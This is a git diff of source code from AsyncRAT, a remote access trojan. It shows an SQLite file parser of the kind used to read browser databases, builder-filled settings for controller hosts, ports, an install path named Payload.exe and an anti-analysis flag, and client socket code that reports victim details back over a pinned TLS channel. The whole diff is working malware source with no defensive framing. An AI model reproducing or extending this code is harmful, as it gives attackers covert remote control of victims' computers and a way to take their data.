(strArray[j].IndexOf("UNIQUE") == 0) + { + break; + } + this.field_names = (string[])Utils.CopyArray((Array)this.field_names, new string[j + 1]); + this.field_names[j] = strArray[j]; + } + return this.ReadTableFromOffset((ulong)((this.master_table_entries[index].root_num - 1L) * this.page_size)); + } + + private bool ReadTableFromOffset(ulong Offset) + { + if (this.db_bytes[(int)Offset] == 13) + { + int num2 = Convert.ToInt32(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)), decimal.One)); + int length = 0; + if (this.table_entries != null) + { + length = this.table_entries.Length; + this.table_entries = (table_entry[])Utils.CopyArray((Array)this.table_entries, new table_entry[(this.table_entries.Length + num2) + 1]); + } + else + { + this.table_entries = new table_entry[num2 + 1]; + } + int num16 = num2; + for (int i = 0; i <= num16; i++) + { + record_header_field[] _fieldArray = null; + ulong num = this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 8M), new decimal(i * 2))), 2); + if (decimal.Compare(new decimal(Offset), 100M) != 0) + { + num += Offset; + } + int endIndex = this.GVL((int)num); + long num9 = this.CVL((int)num, endIndex); + int num8 = this.GVL(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One))); + this.table_entries[length + i].row_id = this.CVL(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One)), num8); + num = Convert.ToUInt64(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(num8), new decimal(num))), decimal.One)); + endIndex = this.GVL((int)num); + num8 = endIndex; + long num7 = this.CVL((int)num, endIndex); + long num10 = Convert.ToInt64(decimal.Add(decimal.Subtract(new decimal(num), new decimal(endIndex)), decimal.One)); + for (int j = 0; num10 < num7; j++) + { + _fieldArray = (record_header_field[])Utils.CopyArray((Array)_fieldArray, new record_header_field[j + 1]); + endIndex = num8 + 1; + num8 = this.GVL(endIndex); + _fieldArray[j].type = this.CVL(endIndex, num8); + if (_fieldArray[j].type > 9L) + { + if (this.IsOdd(_fieldArray[j].type)) + { + _fieldArray[j].size = (long)Math.Round((double)(((double)(_fieldArray[j].type - 13L)) / 2.0)); + } + else + { + _fieldArray[j].size = (long)Math.Round((double)(((double)(_fieldArray[j].type - 12L)) / 2.0)); + } + } + else + { + _fieldArray[j].size = this.SQLDataTypeSize[(int)_fieldArray[j].type]; + } + num10 = (num10 + (num8 - endIndex)) + 1L; + } + this.table_entries[length + i].content = new string[(_fieldArray.Length - 1) + 1]; + int num4 = 0; + int num17 = _fieldArray.Length - 1; + for (int k = 0; k <= num17; k++) + { + if (_fieldArray[k].type > 9L) + { + if (!this.IsOdd(_fieldArray[k].type)) + { + if (decimal.Compare(new decimal(this.encoding), decimal.One) == 0) + { + this.table_entries[length + i].content[k] = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)), new decimal(num4))), (int)_fieldArray[k].size); + } + else if (decimal.Compare(new decimal(this.encoding), 2M) == 0) + { + this.table_entries[length + i].content[k] = Encoding.Unicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)), new decimal(num4))), (int)_fieldArray[k].size); + } + else if (decimal.Compare(new decimal(this.encoding), 3M) == 0) + { + this.table_entries[length + i].content[k] = Encoding.BigEndianUnicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)), new decimal(num4))), (int)_fieldArray[k].size); + } + } + else + { + this.table_entries[length + i].content[k] = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)), new decimal(num4))), (int)_fieldArray[k].size); + } + } + else + { + this.table_entries[length + i].content[k] = Conversions.ToString(this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)), new decimal(num4))), (int)_fieldArray[k].size)); + } + num4 += (int)_fieldArray[k].size; + } + } + } + else if (this.db_bytes[(int)Offset] == 5) + { + ushort num14 = Convert.ToUInt16(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)), decimal.One)); + int num18 = num14; + for (int m = 0; m <= num18; m++) + { + ushort num13 = (ushort)this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 12M), new decimal(m * 2))), 2); + this.ReadTableFromOffset(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger((int)(Offset + num13), 4)), decimal.One), new decimal(this.page_size)))); + } + this.ReadTableFromOffset(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 8M)), 4)), decimal.One), new decimal(this.page_size)))); + } + return true; + } + + [StructLayout(LayoutKind.Sequential)] + private struct record_header_field + { + public long size; + public long type; + } + + [StructLayout(LayoutKind.Sequential)] + private struct sqlite_master_entry + { + public long row_id; + public string item_type; + public string item_name; + public string astable_name; + public long root_num; + public string sql_statement; + } + + [StructLayout(LayoutKind.Sequential)] + private struct table_entry + { + public long row_id; + public string[] content; + } + } +} diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs index 6cdf390..5238476 100644 --- a/AsyncRAT-C#/Client/Settings.cs +++ b/AsyncRAT-C#/Client/Settings.cs @@ -1,23 +1,38 @@ using Client.Cryptography; using System; using System.IO; +using System.Security.Cryptography; +using System.Security.Cryptography.X509Certificates; using System.Text; namespace Client { public static class Settings { +#if DEBUG public static string Ports = "6606"; - public static string Host = "127.0.0.1"; + public static string Hosts = "127.0.0.1"; public static string Version = "AsyncRAT 0.4.7"; public static string Install = "false"; public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe"); - public static string Password = "NYAN CAT"; + public static string Key = "NYAN CAT"; public static string MTX = "%MTX%"; -#if DEBUG + public static string Certificate = "%Certificate%"; + public static string Serversignature = "%Serversignature%"; + public static X509Certificate2 ServerCertificate; public static string Anti = "false"; - public static Aes256 aes256 = new Aes256(Password); + public static Aes256 aes256 = new Aes256(Key); #else + public static string Ports = "%Ports%"; + public static string Hosts = "%Hosts%"; + public static string Version = "AsyncRAT 0.4.8"; + public static string Install = "%Install%"; + public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%Folder%"), "%File%"); + public static string Key = "%Key%"; + public static string MTX = "%MTX%"; + public static string Certificate = "%Certificate%"; + public static string Serversignature = "%Serversignature%"; + public static X509Certificate2 ServerCertificate; public static readonly string Anti = "%Anti%"; public static Aes256 aes256; #endif @@ -30,13 +45,28 @@ namespace Client #endif try { - Password = Encoding.UTF8.GetString(Convert.FromBase64String(Password)); - aes256 = new Aes256(Password); + Key = Encoding.UTF8.GetString(Convert.FromBase64String(Key)); + aes256 = new Aes256(Key); Ports = aes256.Decrypt(Ports); - Host = aes256.Decrypt(Host); - return true; + Hosts = aes256.Decrypt(Hosts); + Serversignature = aes256.Decrypt(Serversignature); + ServerCertificate = new X509Certificate2(Convert.FromBase64String(aes256.Decrypt(Certificate))); + return VerifyHash(); } catch { return false; } } + + private static bool VerifyHash() + { + try + { + var csp = (RSACryptoServiceProvider)ServerCertificate.PublicKey.Key; + return csp.VerifyHash(Sha256.ComputeHash(Encoding.UTF8.GetBytes(Key)), CryptoConfig.MapNameToOID("SHA256"), Convert.FromBase64String(Serversignature)); + } + catch (Exception) + { + return false; + } + } } } \ No newline at end of file diff --git a/AsyncRAT-C#/Client/Sockets/ClientSocket.cs b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs index c25afc8..9944d2c 100644 --- a/AsyncRAT-C#/Client/Sockets/ClientSocket.cs +++ b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs @@ -9,6 +9,9 @@ using System.Net.Sockets; using System.Threading; using System.Text; using System.Security.Principal; +using System.Net.Security; +using System.Security.Authentication; +using System.Security.Cryptography.X509Certificates; // │ Author : NYAN CAT // │ Name : Nyan Socket v0.1 @@ -18,9 +21,10 @@ using System.Security.Principal; namespace Client.Sockets { - public static class ClientSocket + public static class ClientSocket { public static Socket Client { get; set; } + public static SslStream SslClient { get; set; } private static byte[] Buffer { get; set; } private static long Buffersize { get; set; } private static Timer Tick { get; set; } @@ -39,15 +43,20 @@ namespace Client.Sockets ReceiveBufferSize = 50 * 1024, SendBufferSize = 50 * 1024, }; - Client.Connect(Convert.ToString(Settings.Host.Split(',')[new Random().Next(Settings.Host.Split(',').Length)]), + Client.Connect(Convert.ToString(Settings.Hosts.Split(',')[new Random().Next(Settings.Hosts.Split(',').Length)]), Convert.ToInt32(Settings.Ports.Split(',')[new Random().Next(Settings.Ports.Split(',').Length)])); - Debug.WriteLine("Connected!"); - IsConnected = true; - Buffer = new byte[4]; - MS = new MemoryStream(); - Send(SendInfo()); - Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000)); - Client.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, ReadServertData, null); + if (Client.Connected) + { + Debug.WriteLine("Connected!"); + IsConnected = true; + SslClient = new SslStream(new NetworkStream(Client, true), false, ValidateServerCertificate); + SslClient.AuthenticateAsClient(Client.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false); + Buffer = new byte[4]; + MS = new MemoryStream(); + Send(SendInfo()); + Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000)); + SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); + } } catch { @@ -56,12 +65,21 @@ namespace Client.Sockets } } + private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) + { +#if DEBUG + return true; +#endif + return Settings.ServerCertificate.Equals(certificate); + } + public static void Reconnect() { try { Tick?.Dispose(); + SslClient?.Dispose(); Client?.Dispose(); MS?.Dispose(); } @@ -81,7 +99,7 @@ namespace Client.Sockets Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit"); msgpack.ForcePathObject("Path").AsString = Process.GetCurrentProcess().MainModule.FileName; msgpack.ForcePathObject("Version").AsString = Settings.Version; - msgpack.ForcePathObject("Admin").AsString = new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator).ToString().ToLower().Replace("true", "Administrator").Replace("false","User"); + msgpack.ForcePathObject("Admin").AsString = new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator).ToString().ToLower().Replace("true", "Administrator").Replace("false", "User"); TheCPUCounter.NextValue(); msgpack.ForcePathObject("Performance").AsString = $"CPU {(int)TheCPUCounter.NextValue()}% RAM {(int)TheMemCounter.NextValue()}%"; return msgpack.Encode2Bytes(); @@ -96,40 +114,42 @@ namespace Client.Sockets IsConnected = false; return; } - - int recevied = Client.EndReceive(ar); - if (recevied == 4) + int recevied = SslClient.EndRead(ar); + if (recevied > 0) { MS.Write(Buffer, 0, recevied); - Buffersize = BitConverter.ToInt32(MS.ToArray(), 0); - Debug.WriteLine("/// Client Buffersize " + Buffersize.ToString() + " Bytes ///"); - MS.Dispose(); - MS = new MemoryStream(); - if (Buffersize > 0) + if (MS.Length == 4) { - Buffer = new byte[Buffersize]; - while (MS.Length != Buffersize) + Buffersize = BitConverter.ToInt32(MS.ToArray(), 0); + Debug.WriteLine("/// Client Buffersize " + Buffersize.ToString() + " Bytes ///"); + MS.Dispose(); + MS = new MemoryStream(); + if (Buffersize > 0) { - int rc = Client.Receive(Buffer, 0, Buffer.Length, SocketFlags.None); - if (rc == 0) + Buffer = new byte[Buffersize]; + while (MS.Length != Buffersize) { - IsConnected = false; - return; + int rc = SslClient.Read(Buffer, 0, Buffer.Length); + if (rc == 0) + { + IsConnected = false; + return; + } + MS.Write(Buffer, 0, rc); + Buffer = new byte[Buffersize - MS.Length]; } - MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; + if (MS.Length == Buffersize) + { + ThreadPool.QueueUserWorkItem(Packet.Read, MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); + } + else + Buffer = new byte[Buffersize - MS.Length]; } - if (MS.Length == Buffersize) - { - ThreadPool.QueueUserWorkItem(Packet.Read, MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); - } - else - Buffer = new byte[Buffersize - MS.Length]; } - Client.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, ReadServertData, null); + SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); } else { @@ -158,12 +178,13 @@ namespace Client.Sockets if (msg == null) return; - byte[] buffer = Settings.aes256.Encrypt(msg); + byte[] buffer = msg; byte[] buffersize = BitConverter.GetBytes(buffer.Length); Client.Poll(-1, SelectMode.SelectWrite); - Client.Send(buffersize, 0, buffersize.Length, SocketFlags.None); - Client.Send(buffer, 0, buffer.Length, SocketFlags.None); + SslClient.Write(buffersize, 0, buffersize.Length); + SslClient.Write(buffer, 0, buffer.Length); + SslClient.Flush(); } catch {